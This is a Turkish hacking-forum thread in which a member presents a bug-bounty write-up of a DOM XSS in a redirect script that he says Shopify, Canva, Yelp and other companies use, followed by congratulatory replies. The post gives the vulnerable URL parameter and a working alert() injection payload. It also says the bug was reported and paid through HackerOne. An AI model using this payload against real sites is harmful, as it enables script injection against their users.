Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> THT Gövde Gösterisi

THT Gövde Gösterisi BugBounty & Exploit Çalışmalarınızı Sergileyebileceğiniz Bölüm


0day DOM XSS Exploit WriteUp

THT Gövde Gösterisi

Yeni Konu aç Cevapla
 
Seçenekler
Alt 23-01-2019 23:14   #1
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Hall of Fame
Mesajlar
Konular

Teşekkür (Etti): 509
Teşekkür (Aldı): 1254


0day DOM XSS Exploit WriteUp



Merhaba, bu konumda onlarca büyük sitenin kullandığı bir script'te bulduğum bir dom xss'i anlatacağım.

Normal site url'si:
Kod:
https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0
Kaynak Kod:

Tabii ki ilk olarak
Kod:
</script><script>alert(1)</script>
kodunu denedim, ancak özel karakterler için aldığım sonuç;


Daha sonra javascript injection denedim, alert'i almak için uygun kodu yazdım:
Kod:
); alert(docu ment.domain); if (1
Ardından sitede denemek kaldı. Url:
Kod:
https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=); alert(docu ment.domain); if (1
Aldığım sonuç;


Bu script'i kullanan bazı firmalar;
  1. Shopify
  2. Canva
  3. Yelp
  4. Western Union
  5. Cuvva vb.

Ödül: 125$

[EN]
0day DOM XSS Exploit WriteUp



___________________________________________

Legendary

Konu MyGf tarafından (23-01-2019 23:19 Saat 23:19 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

The CrueL, Hichigo, CVirtual, Black Turtle Teşekkür etti.
Alt 23-01-2019 23:17   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Mesajlar
6
Konular
1

Teşekkür (Etti): 1
Teşekkür (Aldı): 3




Ellerinize sağlık hocam ne kadar değerli insanlarsınız. İyi ki forumdasınız.



___________________________________________

Bir kulaç daha atsam karadayım,
Ben hiç böyle bir denize dalmadım,
Üzerimde pantolonum artı ayakkabılarım,
Ha gayret!
Bir sürü fırtına üzerimde dolunay,
Gün yüzü asmış, dalgalar boyum aşmış,
Nefesime gücü bahşet Mevlâ,
Bir kulaç daha atsam olur evelallah.
 Offline  
 
Alıntı ile Cevapla
Alt 23-01-2019 23:18   #3
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Mesajlar
Konular

Teşekkür (Etti): 464
Teşekkür (Aldı): 708




Ellerine sağlık, çok başarılı.

Bildirip parayı aldın mı?



___________________________________________

Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

 Offline  
 
Alıntı ile Cevapla
Alt 23-01-2019 23:20   #4
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Hall of Fame
Mesajlar
Konular

Teşekkür (Etti): 509
Teşekkür (Aldı): 1254




Alıntı:
BirKulacAtsam´isimli üyeden Alıntı Mesajı göster
Ellerinize sağlık hocam ne kadar değerli insanlarsınız. İyi ki forumdasınız.
Teşekkürler.

Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık, çok başarılı.
Bildirip parayı aldın mı?
Neden almayayım ki



___________________________________________

Legendary
 Offline  
 
Alıntı ile Cevapla
Alt 23-01-2019 23:24   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Mesajlar
Konular

Teşekkür (Etti): 464
Teşekkür (Aldı): 708




Alıntı:
MyGf´isimli üyeden Alıntı Mesajı göster
Teşekkürler.


Neden almayayım ki

OJEWIGHQEGJQIETHJQE


Yok yahu al, al tabi, ben sadece kim verdi ve nereye verdi diye sorucaktım OIJEIGJWQEITHJQIETHJQOEIJHQWETJHQWETH "Neden almayayım ki"



___________________________________________

Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

 Offline  
 
Alıntı ile Cevapla
Alt 23-01-2019 23:31   #6
  • Web & Donanım Ekibi
  • Üye Bilgileri
Üyelik tarihi
12/2017
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 248
Teşekkür (Aldı): 318




Köşeyi dönmüşsün yine



___________________________________________

Kafamız güzel ama nasıl güzel, nası güzel.
İletişim: Telegram
Takipte Kalın: Twitter
 Offline  
 
Alıntı ile Cevapla
Alt 23-01-2019 23:42   #7
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Hall of Fame
Mesajlar
Konular

Teşekkür (Etti): 509
Teşekkür (Aldı): 1254




Alıntı:
atmaca7887´isimli üyeden Alıntı Mesajı göster
Köşeyi dönmüşsün yine
Yaptık bir şeyler

Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
.
hackerone'de private programı olan bir firma'dan aldım



___________________________________________

Legendary
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Lawliet123 Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau